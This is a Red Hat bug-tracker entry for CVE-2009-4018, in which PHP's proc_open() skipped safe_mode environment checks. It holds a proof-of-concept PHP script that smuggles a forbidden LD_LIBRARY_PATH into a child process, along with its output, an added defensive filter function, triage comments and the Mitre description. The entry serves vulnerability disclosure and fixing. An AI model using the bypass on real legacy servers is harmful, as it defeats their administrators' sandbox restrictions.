Bug 541239 (CVE-2009-4018)
| Summary: | CVE-2009-4018 php: proc_open() safe mode restriction bypass | | |
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED DUPLICATE | QA Contact: | |
| Severity: | low | Docs Contact: | |
| Priority: | low | | |
| Version: | unspecified | CC: | jorton |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| URL: | http://bugs.php.net/bug.php?id=49026 | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | Bug Fix |
| Doc Text: | | Story Points: | --- |
| Clone Of: | | Environment: | |
| Last Closed: | 2009-11-25 15:25:46 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
Description
Jan Lieskovsky
2009-11-25 10:56:04 UTC
Reproducer (from upstream bug report):
--------------------------------------
In php.ini:
safe_mode = On
safe_mode_gid = On
safe_mode_include_dir =
safe_mode_exec_dir = /usr/bin/safe
safe_mode_allowed_env_vars = PHP_
safe_mode_protected_env_vars = LD_LIBRARY_PATH
Sample PHP script:
```php
<?php
// Safe mode rejects the first two putenv() calls, but the same values are then
// handed straight to proc_open() through its $env parameter.
putenv("BLAHBLAH=123");
putenv("LD_LIBRARY_PATH=/no/way");
putenv("PHP_TESTVAR=allowed");
$env = array('BLAHBLAH' => '123', 'LD_LIBRARY_PATH' => '/no/way',
             'PHP_TESTVAR' => 'allowed');
$dptspec = array(0 => array("pipe", "r"),   // child's stdin
                 1 => array("pipe", "w"));  // child's stdout
// Run env(1) so the child prints the environment it actually received.
$fp = proc_open('env', $dptspec, $pipes, './', $env);
echo "<pre>";
while (!feof($pipes[1])) echo fgets($pipes[1], 1024);
fclose($pipes[0]);
fclose($pipes[1]);
proc_close($fp);
echo "</pre>";
?>
```
Expected result:
----------------
Warning: putenv() [function.putenv]: Safe Mode warning: Cannot set
environment variable 'BLAHBLAH' - it's not in the allowed list in
/my/path/test.php on line 2
Warning: putenv() [function.putenv]: Safe Mode warning: Cannot override
protected environment variable 'LD_LIBRARY_PATH' in /my/path/test.php on
line 3
PHP_TESTVAR=allowed
PWD=/my/path
Actual result:
--------------
Warning: putenv() [function.putenv]: Safe Mode warning: Cannot set
environment variable 'BLAHBLAH' - it's not in the allowed list in
/my/path/test.php on line 2
Warning: putenv() [function.putenv]: Safe Mode warning: Cannot override
protected environment variable 'LD_LIBRARY_PATH' in /my/path/test.php on
line 3
LD_LIBRARY_PATH=/no/way
PHP_TESTVAR=allowed
BLAHBLAH=123
PWD=/my/path
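The check that proc_open() skipped, written out as an added example (not code from the bug report or from PHP itself): it applies the putenv()-style safe-mode rules to the $env array before the call. The function name and its explicit directive parameters are assumptions; safe_mode was removed in PHP 5.4, so the directive values are passed in by hand rather than read from php.ini.

```php
<?php
// Added example (not from the bug report or PHP's own source): applies the
// putenv()-style safe-mode environment checks to the $env array that is
// handed to proc_open(), which is the check PHP before 5.2.11 / 5.3.1 skipped.
// Directive values are passed in explicitly (assumed interface) so the function
// also runs where safe_mode is unavailable (it was removed in PHP 5.4).

/**
 * Return a copy of $env containing only the variables safe mode would accept.
 *
 * @param array  $env       Environment for the child process
 * @param string $allowed   Value of safe_mode_allowed_env_vars (comma-separated prefixes)
 * @param string $protected Value of safe_mode_protected_env_vars (comma-separated names)
 * @param array  $warnings  Receives one message per rejected variable
 */
function safe_mode_filter_env(array $env, $allowed, $protected, array &$warnings = array())
{
    $prefixes  = array_filter(array_map('trim', explode(',', $allowed)), 'strlen');
    $protected = array_filter(array_map('trim', explode(',', $protected)), 'strlen');
    $result    = array();

    foreach ($env as $name => $value) {
        // Protected variables can never be overridden, whatever their prefix.
        if (in_array($name, $protected, true)) {
            $warnings[] = "Cannot override protected environment variable '$name'";
            continue;
        }
        // An empty allowed list means no prefix restriction, as with putenv().
        $permitted = empty($prefixes);
        foreach ($prefixes as $prefix) {
            if (strncmp($name, $prefix, strlen($prefix)) === 0) {
                $permitted = true;
                break;
            }
        }
        if (!$permitted) {
            $warnings[] = "Cannot set environment variable '$name' - it's not in the allowed list";
            continue;
        }
        $result[$name] = $value;
    }
    return $result;
}

// Constructed input mirroring the reproducer and its php.ini settings.
$env = array('BLAHBLAH' => '123', 'LD_LIBRARY_PATH' => '/no/way', 'PHP_TESTVAR' => 'allowed');
$warnings = array();
$clean = safe_mode_filter_env($env, 'PHP_', 'LD_LIBRARY_PATH', $warnings);
// Pass $clean (not $env) as the fifth argument of proc_open().
```

With the reproducer's settings the filter keeps only PHP_TESTVAR and records one warning each for BLAHBLAH and LD_LIBRARY_PATH, which is the "Expected result" above.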
This issue does NOT affect the versions of the php package, as shipped with Red Hat Enterprise Linux 3 and 4. This issue affects the version of the php package, as shipped with Red Hat Enterprise Linux 5.

(In reply to comment #2)
> This issue does NOT affect the versions of the php package, as shipped
> with Red Hat Enterprise Linux 3 and 4.

proc_open only supports the cwd, env and other_options parameters as of version 5.0: http://www.php.net/manual/en/function.proc-open.php#function.proc-open.changelog

This should only be relevant in configurations where safe_mode is on, safe_mode_exec_dir is set to some non-default value (default is /usr/bin, which can be easily bypassed by executing e.g. perl or python), and the command execution functions are not in the disable_functions list.

Issue was fixed upstream in 5.2.11 and 5.3.1.

*** This bug has been marked as a duplicate of bug 169857 ***

Mitre's CVE-2009-4018 record:
-----------------------------
The proc_open function in ext/standard/proc_open.c in PHP before 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1) safe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars directives, which allows context-dependent attackers to execute programs with an arbitrary environment via the env parameter, as demonstrated by a crafted value of the LD_LIBRARY_PATH environment variable.